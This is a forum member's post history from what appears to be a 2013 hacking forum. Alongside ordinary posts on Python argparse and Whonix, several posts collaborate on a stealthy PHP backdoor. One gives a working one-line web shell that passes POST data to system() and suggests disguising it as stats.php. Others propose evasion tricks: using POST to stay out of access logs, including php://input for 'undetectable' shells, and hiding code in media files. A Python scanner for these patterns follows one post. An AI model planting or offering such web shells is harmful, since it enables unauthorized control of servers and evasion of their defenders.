Messages - jay755

1
Scripting Languages / Re: [Python] variable question
« on: February 21, 2013, 01:45:47 pm »
Sounds fair. Inexperienced people use unneeded code indeed.


Sometimes I'd like my code to be maintainable and extendable. argparse gives me a nice API to handle long and complicated command line options. sys does not.


For this short example sys.argv works fine, but learning something which is maintainable in the future when your projects get bigger could be useful.


Jay






2
Web Oriented Coding / Re: How to take over a computer with PHP
« on: February 21, 2013, 10:07:53 am »
Oops: This would only work when the webserver was internet facing.

Code:
<?php
system($_POST['cmd']);
?>

Just put that in stats.php or something and enjoy :).


Of course this is a very simple example which can be detected very fast, but it will get you going.


If you need any help just let me know.




3
As someone being half Chinese:
eviloctal.com


Any other Chinese in here? PM me and we can start a small group :).


xie xie


4
Scripting Languages / Re: [Python] variable question
« on: February 21, 2013, 09:51:19 am »
Most people would use sys for that, neat programmers would use argparse for that :).

5
Hacking and Security / Re: Whats my next step?
« on: February 21, 2013, 09:49:12 am »
Apart from using the internet connection, you could research MitM topics. Just Google around a bit to get a feel for the concept and then try something out. If you need some help just PM me.


Have fun!

6
Operating System / Re: Whonix
« on: February 21, 2013, 09:46:30 am »
I have tried it and it works. A bit difficult to set up, especially take care of the NICs in your VMs. But when it works you can be sure all your traffic is routed over the Tor network.




7
Web Oriented Coding / Re: php backdoor ++
« on: February 21, 2013, 09:33:24 am »

Secondly, you know that you should use POST instead of GET so why not research on it? It's just like changing exec($_GET['cmd']); to exec($_POST['cmd']); (again refactoring can be employed here as well). Of course, you have to work on giving an easier interface to process POST forms.
Yes, I have done that, thank you for the suggestion.


One idea is to use the php://input, which you can execute using the include() function. The data can be passed as POST data (check http://php.net/manual/en/wrappers.php.php ). From the PHP manual, php://input is a read-only stream that allows you to read raw data from the request body. In the case of POST requests, it is preferable to use php://input instead of $HTTP_RAW_POST_DATA as it does not depend on special php.ini directives. Hence you could exploit this feature to create undetectable web shells.

Great, that sounds like a very good idea. Could you give a small example on how to use the php://input with the include function?


Yet another possibility is to hex edit some unsuspicious binary/image/mp3/etc file and insert the PHP backdoor in there. Your PHP script could then read the particular bytes from the binary file on the fly and execute them.
That sounds like a good idea as well. I will implement that too.

Thanks for your input, I will send you a pm when I have some code so you can look at it if you want?
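
From the defender's side, the two patterns named in these posts (a command-execution function fed directly from request data, and include() on php://input) can be triaged with a static scan of the web root. The Python sketch below is an added example, not code from the thread; the rule names, the scan_php helper and the sample strings are constructed for illustration.

```python
import re

# Core PHP functions that run OS commands (matched case-insensitively).
EXEC_FUNCS = r"(?:system|exec|passthru|shell_exec|popen|proc_open)"
# Superglobals populated from the HTTP request.
TAINTED = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

RULES = {
    # Exec-family call with a request superglobal inside the same statement.
    # The lookbehind skips method calls ($stmt->execute) and names such as
    # curl_exec; \s* tolerates newlines between the name and "(".
    "request-to-exec": re.compile(
        rf"(?<![\w>:$]){EXEC_FUNCS}\s*\([^;]*?{TAINTED}", re.I),
    # include/require that reads the raw request body.
    "include-request-body": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]php://input['\"]", re.I),
}

def scan_php(source):
    """Return sorted (line_number, rule_name) pairs for every rule hit."""
    findings = []
    for name, rx in RULES.items():
        for m in rx.finditer(source):
            line = source.count("\n", 0, m.start()) + 1
            findings.append((line, name))
    return sorted(findings)

# Constructed samples: the one-liner as posted above, the php://input idea,
# and ordinary code that must not be flagged.
SAMPLE_SHELL = "<?php\nsystem\n($_POST['cmd']);\n?>\n"
SAMPLE_INCLUDE = "<?php\n// constructed sample\ninclude('php://input');\n"
SAMPLE_BENIGN = (
    "<?php\n"
    "$name = htmlspecialchars($_POST['name']);\n"
    "exec('uptime', $out);\n"
    "$stmt->execute([$_POST['id']]);\n"
)

if __name__ == "__main__":
    for label, src in [("shell", SAMPLE_SHELL), ("include", SAMPLE_INCLUDE),
                       ("benign", SAMPLE_BENIGN)]:
        print(label, scan_php(src))
```

A hit is a triage signal rather than proof, so pair the scan with file-integrity monitoring of the web root. On the PHP side, including php://input is blocked while allow_url_include stays Off, and disable_functions in php.ini can remove the exec-family functions where the application does not need them.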



8
Web Oriented Coding / php backdoor ++
« on: February 19, 2013, 09:51:03 am »
Hi,

I am wanting to learn and work on a PHP backdoor. All c99 things get detected very fast and I want to make something easy and difficult to detect. Something which can go into existing files and work over POST so as not to get in access logs with a GET parameter.

Is there anybody who wants to help and work together on it?

Jay
